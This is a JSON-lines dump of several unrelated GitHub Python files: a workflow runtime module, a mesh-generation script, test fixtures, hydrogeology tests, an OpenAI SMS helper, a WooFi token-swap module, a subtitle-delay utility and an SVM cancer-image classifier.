transformation_id=all_nested_tr[operator.id].id,\n transformation_name=all_nested_tr[operator.id].name,\n transformation_tag=all_nested_tr[operator.id].version_tag,\n operator_id=operator.id,\n operator_name=operator.name,\n sub_nodes=children_nodes(tr_workflow.content, tr_children),\n )\n )\n\n return sub_nodes\n\n return children_nodes(tr_workflow.content, ancestor_children)\n\n\ndef prepare_execution_input(exec_by_id_input: ExecByIdInput) -> WorkflowExecutionInput:\n \"\"\"Loads trafo revision and prepares execution input from it.\n\n Loads the trafo revision specified by id and prepares\n an workflow execution input object which can be executed by the runtime\n -- either code or by calling runtime rest endpoint for running\n workflows.\n\n Note that trafo revisions of type components will be wrapped in\n an ad-hoc workflow structure for execution.\n \"\"\"\n try:\n transformation_revision = read_single_transformation_revision(\n exec_by_id_input.id\n )\n logger.info(\n \"found transformation revision with id %s\", str(exec_by_id_input.id)\n )\n except DBNotFoundError as e:\n raise TrafoExecutionNotFoundError() from e\n\n if transformation_revision.type == Type.COMPONENT:\n tr_workflow = transformation_revision.wrap_component_in_tr_workflow()\n assert isinstance( # noqa: S101\n tr_workflow.content, WorkflowContent\n ) # hint for mypy\n nested_transformations = {\n tr_workflow.content.operators[0].id: transformation_revision\n }\n else:\n tr_workflow = transformation_revision\n nested_transformations = get_all_nested_transformation_revisions(tr_workflow)\n\n nested_components = {\n tr.id: tr for tr in nested_transformations.values() if tr.type == Type.COMPONENT\n }\n workflow_node = tr_workflow.to_workflow_node(\n operator_id=uuid4(),\n sub_nodes=nested_nodes(tr_workflow, nested_transformations),\n )\n\n execution_input = WorkflowExecutionInput(\n code_modules=[\n tr_component.to_code_module() for tr_component in nested_components.values()\n ],\n components=[\n component.to_component_revision()\n for component in nested_components.values()\n ],\n workflow=workflow_node,\n configuration=ConfigurationInput(\n name=str(tr_workflow.id),\n run_pure_plot_operators=exec_by_id_input.run_pure_plot_operators,\n ),\n workflow_wiring=exec_by_id_input.wiring\n if exec_by_id_input.wiring is not None\n else transformation_revision.test_wiring,\n job_id=exec_by_id_input.job_id,\n )\n return execution_input\n\n\nasync def run_execution_input(\n execution_input: WorkflowExecutionInput,\n) -> ExecutionResponseFrontendDto:\n \"\"\"Runs the provided execution input\n\n Depending on configuration this either calls a function or queries the\n external runtime service endpoint (if this instance is not considered to\n act as runtime service).\n\n Raises subtypes of TrafoExecutionError on errors.\n \"\"\"\n run_execution_input_measured_step = PerformanceMeasuredStep.create_and_begin(\n \"run_execution_input\"\n )\n\n output_types = {\n output.name: output.type for output in execution_input.workflow.outputs\n }\n\n execution_result: WorkflowExecutionResult\n\n if get_config().is_runtime_service:\n execution_result = await runtime_service(execution_input)\n else:\n try:\n headers = await get_auth_headers(external=False)\n except ServiceAuthenticationError as e:\n msg = (\n \"Failed to get auth headers for internal runtime execution request.\"\n f\" Error was:\\n{str(e)}\"\n )\n logger.info(msg)\n raise TrafoExecutionRuntimeConnectionError(msg) from e\n\n async with httpx.AsyncClient(\n 
verify=get_config().hd_runtime_verify_certs,\n timeout=get_config().external_request_timeout,\n ) as client:\n url = posix_urljoin(get_config().hd_runtime_engine_url, \"runtime\")\n try:\n response = await client.post(\n url,\n headers=headers,\n json=json.loads(\n execution_input.json()\n ), # TODO: avoid double serialization.\n # see https://github.com/samuelcolvin/pydantic/issues/1409 and\n # https://github.com/samuelcolvin/pydantic/issues/1409#issuecomment-877175194\n timeout=None,\n )\n except httpx.HTTPError as e:\n # handles both request errors (connection problems)\n # and 4xx and 5xx errors. See https://www.python-httpx.org/exceptions/\n msg = f\"Failure connecting to hd runtime endpoint ({url}):\\n{str(e)}\"\n logger.info(msg)\n raise TrafoExecutionRuntimeConnectionError(msg) from e\n try:\n json_obj = response.json()\n execution_result = WorkflowExecutionResult(**json_obj)\n except ValidationError as e:\n msg = (\n f\"Could not validate hd runtime result object. Exception:\\n{str(e)}\"\n f\"\\nJson Object is:\\n{str(json_obj)}\"\n )\n logger.info(msg)\n raise TrafoExecutionResultValidationError(msg) from e\n\n execution_response = ExecutionResponseFrontendDto(\n **execution_result.dict(),\n output_types_by_output_name=output_types,\n )\n\n run_execution_input_measured_step.stop()\n\n execution_response.measured_steps.run_execution_input = (\n run_execution_input_measured_step\n )\n return execution_response\n\n\nasync def execute_transformation_revision(\n exec_by_id_input: ExecByIdInput,\n) -> ExecutionResponseFrontendDto:\n \"\"\"Execute transformation revision\n\n raises subtypes of TrafoExecutionError on errors.\n \"\"\"\n\n execution_context_filter.bind_context(job_id=exec_by_id_input.job_id)\n\n # prepare execution input\n\n prep_exec_input_measured_step = PerformanceMeasuredStep.create_and_begin(\n \"prepare_execution_input\"\n )\n\n execution_input = prepare_execution_input(exec_by_id_input)\n\n prep_exec_input_measured_step.stop()\n\n exec_resp_frontend_dto = await run_execution_input(execution_input)\n exec_resp_frontend_dto.measured_steps.prepare_execution_input = (\n prep_exec_input_measured_step\n )\n return exec_resp_frontend_dto\n","repo_name":"hetida/hetida-designer","sub_path":"runtime/hetdesrun/backend/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":12315,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"78"} +{"seq_id":"22963496332","text":"import meshio\nimport pygmsh\nimport pyvista as pv\n\nproject_folder = \"/home/daalgi/tut/fem/aster/00frame\"\n\nwith pygmsh.geo.Geometry() as geom:\n # geom.characteristic_length_max = 0.5\n\n length = 10\n mesh_size = 5\n\n geom.characteristic_length_max = mesh_size\n beam = geom.add_line(\n geom.add_point((0, 0, 0), mesh_size=mesh_size),\n geom.add_point((length, 0, 0), mesh_size=mesh_size),\n )\n\n geom.add_physical(beam, \"beam\")\n # geom.add_physical(beam.points[0], \"left_bc\")\n # geom.add_physical(beam.points[1], \"right_bc\")\n\n # geom.set_transfinite_curve(beam, 10, \"Progression\", 1)\n mesh = geom.generate_mesh()\n print(mesh)\n # Save mesh in a vtk file\n file_vtk = \"./salome/beam1d.vtk\"\n mesh.write(file_vtk)\n file_med = \"./salome/beam1d.med\"\n mesh.write(file_med)\n\n # Plot\n grid = pv.read(file_vtk)\n grid.plot(show_axes=True, 
show_edges=True)\n\n","repo_name":"daalgi/fem-scripts","sub_path":"salome/beam1d.py","file_name":"beam1d.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1325090730","text":"import os\nimport tempfile\n\nimport pytest\nfrom flask import template_rendered\n\nfrom recepies import create_app\n\n@pytest.fixture\ndef app():\n db_fd, db_path = tempfile.mkstemp()\n app = create_app({\"TESTING\": True, \"DATABASE\": db_path})\n \n yield app\n\n os.close(db_fd)\n os.unlink(db_path)\n\n@pytest.fixture\ndef client(app):\n return app.test_client()\n\n@pytest.fixture\ndef runner(app):\n return app.test_cli_runner()\n\n@pytest.fixture\ndef captured_templates(app):\n recorded = []\n\n def record(sender, template, context, **extra):\n recorded.append((template, context))\n\n template_rendered.connect(record, app)\n try:\n yield recorded\n finally:\n template_rendered.disconnect(record, app)\n\n","repo_name":"iamnotgabriel/recepie-book","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34416558695","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport hydrogeosines as hgs\n\n#%% test the model\nhgs = hgs.site('TEST', geoloc=[141.762065, -31.065781, 160])\n\nhgs.data.import_csv('test_data/fowlers_gap/acworth_short.csv', dt_fmt='%d/%m/%Y %H:%M')\nprint(hgs.data.all)\n\ntimefloat = hgs.data.tf.values\ndata = hgs.data.all['{BP}'].values\ndata1, result1 = hgs.method.lin_window_ovrlp(timefloat, data)\ndata2, result2 = hgs.method.hals(timefloat, data1, freqs='AT')\n\n#%%\nfig, axs = plt.subplots(2)\nfig.suptitle('HALS Estimation')\n\naxs[0].plot(hgs.data.all.index.values, data - np.nanmean(data))\naxs[0].plot(hgs.data.all.index.values, data1)\naxs[0].plot(hgs.data.all.index.values, data2)\n\naxs[1].plot(np.angle(result2['comp']), np.abs(result2['comp']), '.r')\naxs[1].set_xlim([-np.pi, np.pi])\n\n#%% \n# heads = hgs.data.correct_heads(locs=['Smith'])\n# heads = hgs.data.correct_heads()\n# print(heads)\n\n# #%%\n# # new_t = pd.date_range(start='2014-10-21 00:00', end='2016-05-18 05:15', freq='15min').to_series()\n# # new_t.to_csv('time.csv')\n\n#%%\nbe = hgs.data.calc_BE(method='acworth')\nprint(be)\n\nbe = hgs.data.calc_BE(method='rau')\nprint(be)\n","repo_name":"HydroGeoSines/HydroGeoSines","sub_path":"tests/acworth_v0.py","file_name":"acworth_v0.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"71619227133","text":"import openai as op\nimport os\nimport re\nimport random\nfrom datetime import datetime, timedelta\nimport random\nimport time\n\n#examples puller\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.vectorstores import FAISS\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\n\ndef find_txt_examples(query, k=8):\n loader = TextLoader(\"sops.txt\")\n documents = loader.load()\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=600, chunk_overlap=50, length_function = len, is_separator_regex = False)\n docs = text_splitter.split_documents(documents)\n for doc in docs:\n print(len(str(doc)))\n embeddings = OpenAIEmbeddings()\n\n db = FAISS.from_documents(docs, embeddings)\n docs = db.similarity_search(query, 
k=k)\n\n examples = \"\"\n i = 1\n for doc in docs:\n examples += f'\\n\\nSNIPPET {i}' + doc.page_content\n i+=1\n return examples\n\n\n#generate openai response; returns messages with openai response\ndef ideator(messages, lead_dict_info):\n#\n prompt = messages[0]['content']\n messages = messages[1:]\n new_message = messages[-1]['content']\n\n #perform similarity search\n examples = find_txt_examples(new_message, k=5)\n \n prompt = prompt + examples\n prompt = prompt.format(**lead_dict_info)\n #print('inbound message: ' + str(messages[-1]))\n #print('prompt' + prompt)\n #print('\\n\\n')\n prompt = {'role': 'system', 'content': prompt}\n messages.insert(0,prompt)\n \n for message in messages:\n print(message)\n for i in range(5):\n try:\n key = os.environ.get(\"OPENAI_API_KEY\")\n op.api_key = key\n \n result = op.ChatCompletion.create(\n model=\"gpt-4\",\n messages= messages,\n max_tokens = 500,\n temperature = 0\n )\n response = result[\"choices\"][0][\"message\"][\"content\"]\n #print('response:')\n #print(response)\n #print('\\n\\n')\n break\n except Exception as e: \n error_message = f\"Attempt {i + 1} failed: {e}\"\n #print(error_message)\n if i < 4: # we don't want to wait after the last try\n time.sleep(5) # wait for 5 seconds before the next attempt\n \n def split_sms(message):\n import re\n \n # Use regular expressions to split the string at ., !, or ? followed by a space or newline\n sentences = re.split('(?<=[.!?]) (?=\\\\S)|(?<=[.!?])\\n', message.strip())\n # Strip leading and trailing whitespace from each sentence\n sentences = [sentence.strip() for sentence in sentences if sentence.strip()]\n \n # Compute the cumulative length of all sentences\n cum_length = [0]\n for sentence in sentences:\n cum_length.append(cum_length[-1] + len(sentence))\n \n total_length = cum_length[-1]\n \n # Find the splitting point\n split_point = next(i for i, cum_len in enumerate(cum_length) if cum_len >= total_length / 2)\n \n # Split the sentences into two parts at the splitting point\n part1 = sentences[:split_point]\n part2 = sentences[split_point:]\n \n # Join the sentences in each part back into strings and exclude any part that is empty\n strings = []\n if part1:\n strings.append(\" \".join(part1))\n if part2:\n strings.append(\" \".join(part2))\n \n return strings\n\n response = add_space_after_url(response)\n split_response = split_sms(response)\n count = len(split_response)\n for section in split_response:\n section = add_space_after_url(section)\n section = {\n \"role\": \"assistant\", \n \"content\": section\n }\n messages.append(section)\n \n return messages, count\n \n\ndef add_space_after_url(s):\n words = s.split()\n for i, word in enumerate(words):\n if word.startswith('http://') or word.startswith('https://'):\n if word[-1] in '.,!?;:':\n words[i] = word[:-1] + ' ' + word[-1] + ' '\n else:\n words[i] = word + ' '\n return ' '.join(words)\n\n\ndef create_produce_link_url(buyer_or_supplier, inputs):\n to_append = ''\n for input in inputs:\n to_append += f'&commodity{inputs}'\n\n base = 'https://app.fullharvest.com/listings?anonymous=true'\n search_produce_link = base + to_append\n\n return search_produce_link\n\n\n \n\n ","repo_name":"uqarni/fullharvest-demo","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25118780891","text":"#!/usr/bin/env python\n\nimport numpy\nfrom scipy import fftpack\n\ndef array_delay(a1, a2):\n l = 
len(a1)\n if l != len(a2): raise(Exception(\"rfvale\"))\n # We fill with zeros to can detect if we need +t or -t\n a1 = numpy.append(a1, a1*0)\n a2 = numpy.append(a2, a2*0)\n r = len(a1) - len(a2)\n if r > 0:\n a2 = numpy.append(a2, a1[0:r])\n elif r < 0:\n a1 = numpy.append(a1, a2[0:-r])\n a1 = fftpack.fft(a1, axis=0)\n a2 = fftpack.fft(a2, axis=0)\n # FFT convolution\n c1 = numpy.argmax(numpy.abs(fftpack.ifft(-a1.conjugate()*a2, axis=0))) #delay a1 + shift = a2\n # Be careful, this is a circular convolution, we always delay the minimum range possible\n # because we are calculating a sample of the audio, not fully\n return (c1 if c1 <= l else c1 - l*2)\n\ndef text_delay(forig, fpost, maxdelay = 2000):\n dorig = how_text(forig)\n dorig.sort()\n dpost = how_text(fpost)\n dpost.sort()\n diff = dorig[0].start - dpost[0].start\n if abs(diff) > maxdelay:\n print(\"Right File:\")\n for i in range(0, 20):\n print(\"{} - {}\".format(i, dorig[i].text.encode(\"utf-8\")))\n print(\"\\nDelayed File:\")\n for i in range(0, 20):\n print(\"{} - {}\".format(i, dpost[i].text.encode(\"utf-8\")))\n i1 = int(input('Line for right file:'))\n i2 = int(input('Line for delayed file:'))\n return dorig[i2].start - dpost[i1].start\n\n","repo_name":"latot/SubsWorker","sub_path":"SubsWorker/Delay.py","file_name":"Delay.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33769075687","text":"from loguru import logger\nfrom web3 import Web3\nfrom config import WOOFI_CONTRACTS, WOOFI_ROUTER_ABI, BASE_TOKENS\nfrom .account import Account\n\n\nclass WooFi(Account):\n def __init__(self, account_id: int, private_key: str) -> None:\n super().__init__(account_id=account_id, private_key=private_key, chain=\"base\")\n\n self.swap_contract = self.get_contract(WOOFI_CONTRACTS[\"router\"], WOOFI_ROUTER_ABI)\n\n self.tx = {\n \"from\": self.address,\n \"gasPrice\": self.w3.eth.gas_price,\n \"nonce\": self.w3.eth.get_transaction_count(self.address)\n }\n\n def get_min_amount_out(self, from_token: str, to_token: str, amount: int, slippage: float):\n min_amount_out = self.swap_contract.functions.querySwap(\n Web3.to_checksum_address(from_token),\n Web3.to_checksum_address(to_token),\n amount\n ).call()\n return int(min_amount_out - (min_amount_out / 100 * slippage))\n\n def swap(\n self,\n from_token: str,\n to_token: str,\n min_amount: float,\n max_amount: float,\n decimal: int,\n slippage: int,\n all_amount: bool,\n min_percent: int,\n max_percent: int\n ):\n amount_wei, amount, balance = self.get_amount(\n from_token,\n min_amount,\n max_amount,\n decimal,\n all_amount,\n min_percent,\n max_percent\n )\n\n logger.info(\n f\"[{self.account_id}][{self.address}] Swap on WooFi – {from_token} -> {to_token} | {amount} {from_token}\"\n )\n\n try:\n if from_token == \"ETH\":\n from_token_address = \"0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE\"\n to_token_address = Web3.to_checksum_address(BASE_TOKENS[to_token])\n self.tx.update({\"value\": amount_wei})\n else:\n from_token_address = Web3.to_checksum_address(BASE_TOKENS[from_token])\n to_token_address = \"0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE\"\n\n self.approve(amount_wei, from_token_address, WOOFI_CONTRACTS[\"router\"])\n self.tx.update({\"nonce\": self.w3.eth.get_transaction_count(self.address)})\n\n min_amount_out = self.get_min_amount_out(from_token_address, to_token_address, amount_wei, slippage)\n\n contract_txn = self.swap_contract.functions.swap(\n from_token_address,\n 
to_token_address,\n amount_wei,\n min_amount_out,\n self.address,\n self.address\n ).build_transaction(self.tx)\n\n signed_txn = self.sign(contract_txn)\n\n txn_hash = self.send_raw_transaction(signed_txn)\n\n self.wait_until_tx_finished(txn_hash.hex())\n except Exception as e:\n logger.error(f\"[{self.account_id}][{self.address}] Error | {e}\")\n","repo_name":"Samogonshikua/BASE.","sub_path":"modules/woofi.py","file_name":"woofi.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"1577200155","text":"import pickle\n# from msilib.schema import Error\nfrom pickle import PickleError\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n\nimport sys\nimport getopt\nimport pandas as pd\nimport os\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nfrom os import listdir\nfrom skimage.transform import resize\nfrom skimage.io import imread\nfrom PIL import Image\nfrom matplotlib.pyplot import imread\nfrom skimage.io import imread\nfrom sklearn import svm\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n\nFILE_DIR = os.listdir(\"/Users/owenwebb/E90_data/archive-2/IDC_regular_ps50_idx5/\")\nBASE_PATH = \"/Users/owenwebb/E90_data/archive-2/IDC_regular_ps50_idx5/\"\nPICKLE_PATH = \"/Users/owenwebb/E90_data/\"\nFOLDER = os.listdir(BASE_PATH)\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Will extract x and y coordinates from the path to file\ndef extract_coords(df):\n coord = df.path.str.rsplit(\"_\", n=4, expand=True)\n coord = coord.drop([0, 1, 4], axis=1)\n coord = coord.rename({2: \"x\", 3: \"y\"}, axis=1)\n coord.loc[:, \"x\"] = coord.loc[:,\"x\"].str.replace(\"x\", \"\", case=False).astype(np.int)\n coord.loc[:, \"y\"] = coord.loc[:,\"y\"].str.replace(\"y\", \"\", case=False).astype(np.int)\n df.loc[:, \"x\"] = coord.x.values\n df.loc[:, \"y\"] = coord.y.values\n return df\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# creates a new dataframe for each patient\ndef get_cancer_dataframe(patient_id, cancer_id):\n path = BASE_PATH + patient_id + \"/\" + cancer_id\n files = listdir(path)\n dataframe = pd.DataFrame(files, columns=[\"filename\"])\n path_names = path + \"/\" + dataframe.filename.values\n dataframe = dataframe.filename.str.rsplit(\"_\", n=4, expand=True)\n dataframe.loc[:, \"target\"] = np.int(cancer_id)\n dataframe.loc[:, \"path\"] = path_names\n dataframe = dataframe.drop([0, 1, 4], axis=1)\n dataframe = dataframe.rename({2: \"x\", 3: \"y\"}, axis=1)\n dataframe.loc[:, \"x\"] = dataframe.loc[:,\"x\"].str.replace(\"x\", \"\", case=False).astype(np.int)\n dataframe.loc[:, \"y\"] = dataframe.loc[:,\"y\"].str.replace(\"y\", \"\", case=False).astype(np.int)\n return dataframe\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Simply calls for certain patient for positive and negative\ndef get_patient_dataframe(patient_id):\n df_0 = get_cancer_dataframe(patient_id, \"0\")\n df_1 = get_cancer_dataframe(patient_id, \"1\")\n patient_df = df_0.append(df_1)\n return patient_df\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# simply combines all of one patient to print image and overlay of where cancer is\ndef visualise_breast_tissue(patient_id, pred_df=None):\n example_df = get_patient_dataframe(patient_id)\n max_point = [example_df.y.max()-1, example_df.x.max()-1]\n grid = 255*np.ones(shape 
= (max_point[0] + 50, max_point[1] + 50, 3)).astype(np.uint8)\n mask = 255*np.ones(shape = (max_point[0] + 50, max_point[1] + 50, 3)).astype(np.uint8)\n if pred_df is not None:\n patient_df = pred_df[pred_df.patient_id == patient_id].copy()\n mask_proba = np.zeros(shape = (max_point[0] + 50, max_point[1] + 50, 1)).astype(np.float)\n \n broken_patches = []\n for n in range(len(example_df)):\n try:\n image = imread(example_df.path.values[n])\n \n target = example_df.target.values[n]\n \n x_coord = np.int(example_df.x.values[n])\n y_coord = np.int(example_df.y.values[n])\n x_start = x_coord - 1\n y_start = y_coord - 1\n x_end = x_start + 50\n y_end = y_start + 50\n\n grid[y_start:y_end, x_start:x_end] = image\n if target == 1:\n mask[y_start:y_end, x_start:x_end, 0] = 250\n mask[y_start:y_end, x_start:x_end, 1] = 0\n mask[y_start:y_end, x_start:x_end, 2] = 0\n if pred_df is not None:\n \n proba = patient_df[\n (patient_df.x==x_coord) & (patient_df.y==y_coord)].proba\n mask_proba[y_start:y_end, x_start:x_end, 0] = np.float(proba)\n\n except ValueError:\n broken_patches.append(example_df.path.values[n])\n \n \n return grid, mask, broken_patches, mask_proba\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Load the image data into the dataframes\ndef load_dataframes_from_raw_save_as_pickle(filename):\n target_arr=[]\n # datadir='/Users/owenwebb/E90_data/archive-2/IDC_regular_ps50_idx5'\n patient_id_arr = []\n path_arr = []\n\n for n in range(len(FOLDER)):\n patient_id = FOLDER[n]\n patient_path = BASE_PATH + patient_id \n for c in [0,1]:\n class_path = patient_path + \"/\" + str(c) + \"/\"\n subfiles = os.listdir(class_path)\n for img in range(len(subfiles)):\n image_path = subfiles[img]\n complete_path = os.path.join(class_path,image_path)\n target_arr.append(c)\n patient_id_arr.append(patient_id)\n path_arr.append(complete_path)\n \n target=np.array(target_arr)\n patient_id_np = np.array(patient_id_arr)\n path_arr_np = np.array(path_arr)\n data=pd.DataFrame()\n data[\"target\"]=target\n data[\"patient_id\"] = patient_id_np\n data[\"path\"] = path_arr_np\n\n data.to_pickle(filename)\n\n return data\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Counts the total images in the files\ndef print_num_images():\n total_images = 0\n for n in range(len(FOLDER)):\n patient_id = FOLDER[n]\n for c in [0, 1]:\n patient_path = BASE_PATH + patient_id \n class_path = patient_path + \"/\" + str(c) + \"/\"\n subfiles = os.listdir(class_path)\n total_images += len(subfiles)\n \n print(\"total number of images = %d\" %total_images)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\n# Plot the histogram fequencies for patients\ndef plot_hist_frequencies(data):\n cancer_perc = data.groupby(\"patient_id\").target.value_counts()/ data.groupby(\"patient_id\").target.size()\n cancer_perc = cancer_perc.unstack()\n _, ax = plt.subplots(1,3,figsize=(20,5))\n sns.distplot(data.groupby(\"patient_id\").size(), ax=ax[0], color=\"Orange\", kde=False, bins=30)\n ax[0].set_xlabel(\"Number of patches\")\n ax[0].set_ylabel(\"Frequency\")\n ax[0].set_title(\"How many patches do we have per patient?\")\n sns.distplot(cancer_perc.loc[:, 1]*100, ax=ax[1], color=\"Tomato\", kde=False, bins=30)\n ax[1].set_title(\"How much percentage of an image is covered by IDC?\")\n ax[1].set_ylabel(\"Frequency\")\n ax[1].set_xlabel(\"'%' of patches with IDC\")\n sns.countplot(data.target, palette=\"Set2\", ax=ax[2])\n ax[2].set_xlabel(\"no(0) versus yes(1)\")\n ax[2].set_title(\"How many patches show IDC?\")\n return \n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef plot_pos_selection(data):\n 
pos_selection = np.random.choice(data[data.target==1].index.values, size=50, replace=False)\n fig, ax = plt.subplots(5,10,figsize=(20,10))\n\n for n in range(5):\n for m in range(10):\n idx = pos_selection[m + 10*n]\n image = imread(data.loc[idx, \"path\"])\n ax[n,m].imshow(image)\n ax[n,m].grid(False)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef plot_neg_selection(data):\n neg_selection = np.random.choice(data[data.target==0].index.values, size=50, replace=False)\n fig, ax = plt.subplots(5,10,figsize=(20,10))\n\n for n in range(5):\n for m in range(10):\n idx = neg_selection[m + 10*n]\n image = imread(data.loc[idx, \"path\"])\n ax[n,m].imshow(image)\n ax[n,m].grid(False)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef plot_x_y_values(data):\n # Will get an examle dataframe for the first patient\n example = get_patient_dataframe(data.patient_id.values[0])\n # example.head()\n\n _, ax = plt.subplots(5,3,figsize=(20, 27))\n\n patient_ids = data.patient_id.unique()\n\n # will print out 15 patient values to establish x and y importance\n for n in range(5):\n for m in range(3):\n patient_id = patient_ids[m + 3*n]\n example_df = get_patient_dataframe(patient_id)\n \n ax[n,m].scatter(example_df.x.values, example_df.y.values, c=example_df.target.values, cmap=\"coolwarm\", s=20);\n ax[n,m].set_title(\"patient \" + patient_id)\n ax[n,m].set_xlabel(\"y coord\")\n ax[n,m].set_ylabel(\"x coord\")\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef visualize_one_example():\n example = \"13616\"\n grid, mask, broken_patches,_ = visualise_breast_tissue(example)\n\n _, ax = plt.subplots(1,2,figsize=(20,10))\n ax[0].imshow(grid, alpha=0.9)\n ax[1].imshow(mask, alpha=0.8)\n ax[1].imshow(grid, alpha=0.7)\n ax[0].grid(False)\n ax[1].grid(False)\n for m in range(2):\n ax[m].set_xlabel(\"y-coord\")\n ax[m].set_ylabel(\"y-coord\")\n ax[0].set_title(\"Breast tissue slice of patient: \" + example)\n ax[1].set_title(\"Cancer tissue colored red \\n of patient: \" + example)\n return\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef flatten_image_and_new_df(data, filename):\n start = time.time()\n flat_data_arr = []\n\n for img_path in data.path:\n img_array=imread(img_path)\n img_resized=resize(img_array,(50,50,3))\n flat_data_arr.append(img_resized.flatten())\n\n flat_data=np.array(flat_data_arr, dtype=np.float)\n\n end = time.time()\n print(\"create flat data = %f\" %(end-start))\n\n data = extract_coords(data)\n \n # creates a dataframe that contains the images as rows with features at columns\n df = pd.DataFrame(flat_data)\n df[\"target\"] = data[\"target\"]\n df[\"patient_id\"] = data[\"patient_id\"]\n df[\"x\"] = data[\"x\"]\n df[\"y\"] = data[\"y\"]\n\n df.to_pickle(filename)\n return df\n\ndef plot_train_test_dev(train_df, dev_df, test_df):\n _, ax = plt.subplots(1,3,figsize=(20,5))\n sns.countplot(train_df.target, ax=ax[0], palette=\"Reds\")\n ax[0].set_title(\"Train data\")\n sns.countplot(dev_df.target, ax=ax[1], palette=\"Blues\")\n ax[1].set_title(\"Dev data\")\n sns.countplot(test_df.target, ax=ax[2], palette=\"Greens\")\n ax[2].set_title(\"Test data\")\n\n\n\"\"\"\nDEFINITION: \n\"\"\"\ndef main(argv):\n load_imgs = False\n load_original_df = False\n plots = False\n try:\n opts, args = getopt.getopt(argv,\"hiop\",[])\n except getopt.GetoptError:\n print (\"svm_image_cancer_code.py -i -o\\n\\\n -i = load all the images again\\n\\\n -o = load the original dataframe\\n\\\n -p = plot the images\")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print (\"svm_image_cancer_code.py -i -o\\n\\\n -i = load all the images 
again\\n\\\n -o = load the original dataframe\\n\\\n -p = plot the images\")\n sys.exit()\n elif opt in (\"-i\", \"--images\"):\n load_imgs = True\n elif opt in (\"-o\", \"--originaldf\"):\n load_original_df = True\n elif opt in (\"-p\", \"--plots\"):\n plots = True\n\n print_num_images()\n\n pickle_file = os.path.join(PICKLE_PATH, \"data_no_image.pkl\")\n # load_data.py file\n \n if load_original_df:\n print(\"Begining to Load Original Dataframe\")\n data = load_dataframes_from_raw_save_as_pickle(pickle_file)\n print(\"Done Loading Original Dataframe\")\n else:\n try:\n print(\"Attempting to read from %s\" %(pickle_file))\n data = pd.read_pickle(pickle_file)\n print(\"Successfully Read Original Dataframe From Pickle File\")\n except Exception:\n print(\"ERROR: cannot read pickle file. Need to load in original dataframe file\")\n exit(2)\n if plots:\n print(\"Plots Are On\")\n plot_hist_frequencies(data)\n plot_pos_selection(data) \n plot_neg_selection(data)\n plot_x_y_values(data)\n visualize_one_example()\n\n # convert to make data more compressed\n data[\"patient_id\"] = data[\"patient_id\"].astype(int)\n data[\"target\"] = data[\"target\"].astype(int)\n\n\n img_pickle_file = os.path.join(PICKLE_PATH, \"img_pickle_file.pkl\")\n if load_imgs:\n print(\"Begining to Load Images Dataframe\")\n start = time.time()\n df = flatten_image_and_new_df(data, img_pickle_file)\n end = time.time()\n print(\"Done Loading Images Dataframe. Took %ds\" %(end-start))\n else:\n try:\n print(\"Attempting to read from %s\" %(img_pickle_file))\n df = pd.read_pickle(img_pickle_file)\n print(\"Successfully Read Image Dataframe From Pickle File\")\n except Exception:\n print(\"ERROR: cannot read pickle file. Need to load in image dataframe file\")\n exit(2)\n\n\n # split based on patient_id, so that we can train on all the x and y's\n patients = data.patient_id.unique()\n\n train_ids, sub_test_ids = train_test_split(patients,\n test_size=0.3,\n random_state=0)\n test_ids, dev_ids = train_test_split(sub_test_ids, test_size=0.5, random_state=0)\n\n # divy up the data into a train, test, and dev dataframes\n start = time.time()\n train_df = df.loc[data.patient_id.isin(train_ids),:]\n test_df = df.loc[data.patient_id.isin(test_ids),:]\n dev_df = df.loc[data.patient_id.isin(dev_ids),:]\n end = time.time()\n \n print(\"time: %f\" %(end-start))\n if plots:\n plot_train_test_dev(train_df, dev_df, test_df)\n\n # param_grid={'C':[0.1,1,10,100],'gamma':[0.0001,0.001,0.1,1],'kernel':['rbf','poly']}\n\n svc=svm.SVC(probability=True)\n\n # model=GridSearchCV(svc,param_grid,scoring='accuracy')\n\n print(\"Starting SVC Training\")\n svc.fit(train_df[train_df.columns.difference([\"target\",\"patient_id\"])], train_df.target)\n print(\"Finished SVC 